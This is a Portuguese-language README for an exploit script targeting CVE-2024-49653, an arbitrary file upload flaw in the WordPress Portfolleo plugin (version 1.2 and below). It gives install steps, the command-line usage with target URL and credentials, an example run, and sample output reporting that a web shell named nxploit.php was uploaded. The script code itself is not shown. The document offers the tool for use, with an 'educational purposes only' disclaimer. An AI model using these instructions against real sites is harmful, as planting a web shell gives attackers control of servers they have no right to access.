
WordPress Portfolleo plugin <= 1.2 - Vulnerabilidade de upload arbitrário de arquivo
Título: Plugin Portfolleo do WordPress <= 1.2 - Vulnerabilidade de Upload Arbitrário de Arquivo
Descrição:
A vulnerabilidade de Upload Irrestrito de Arquivo com Tipo Perigoso no Portfolleo de James Eggers permite o upload de uma web shell para um servidor web. Este problema afeta o Portfolleo da versão n/a até 1.2.
Saiba Mais:
Pontuação CVSS:
Este script explora a vulnerabilidade de Upload Arbitrário de Arquivo no plugin Portfolleo do WordPress (versões <= 1.2) para fazer upload de uma web shell.
Você precisa ter o seguinte instalado para executar o script:
requests librarybeautifulsoup4 libraryVocê pode instalar as bibliotecas necessárias usando:
pip install requests beautifulsoup4
Execute o script com as seguintes opções:
CVE-2024-49653.py [-h] -u URL -U USERNAME -p PASSWORD
WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability # by Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Base URL of the site (e.g. http://target/wordpress)
-U, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
python CVE-2024-49653.py -u http://target/wordpress.com -U Nxploited -p password123
Se o script for executado com sucesso, você deverá ver a seguinte saída:
[+] Logged in successfully.
[+] Extracted _wpnonce: e5f7ffa134
[+] Shell has been uploaded.
[*] Check the shell here: http://target.com/wp-content/portfolleo/nxploit.php
Este script é destinado apenas para fins educacionais. O autor não condona o uso deste script para atividades ilegais. Use-o de forma responsável e apenas em sistemas para os quais você tenha permissão explícita para testar.
Por: Nxploited | Khaled Alenazi